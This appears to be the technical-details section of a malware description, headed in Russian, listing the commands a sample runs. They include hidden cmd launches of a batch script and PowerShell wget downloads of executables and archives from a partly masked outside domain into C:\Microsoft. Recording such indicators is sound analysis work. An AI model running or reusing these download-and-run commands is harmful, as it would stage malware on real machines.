Техническая информация
- '<SYSTEM32>\wscript.exe' "C:\Microsoft\rewop.vbs"
- C:\microsoft\rewop.cmd
- C:\microsoft\rewop.vbs
- '<SYSTEM32>\cmd.exe' /c start /b C:\Microsoft\rewop.cmd' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c start /b C:\Microsoft\rewop.cmd
- '<SYSTEM32>\cmd.exe' /K C:\Microsoft\rewop.cmd
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' wget "https://www.cj##nt.com/doc/21_06/KFhgIAPI1Nh_RunNHide.oui" -outfile "C:\Microsoft\RunNHide.exe"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' wget "https://www.cj##nt.com/doc/21_06/KFhgGnVnrCh_dControl.oui" -outfile "C:\Microsoft\dcontrol.exe"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' wget "https://www.cj##nt.com/doc/21_06/KFioWkUnsM3_protect.cmd" -outfile "C:\Microsoft\protect.cmd"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' wget "https://www.cj##nt.com/doc/21_06/KFipDLoQbu3_update2.zip" -outfile "C:\Microsoft\update2.zip"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Expand-Archive C:\Microsoft\update2.zip -DestinationPath C:\Microsoft"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Expand-Archive C:\PerfLogs\Microsoft.zip -DestinationPath C:\Microsoft"
- '<SYSTEM32>\timeout.exe' 5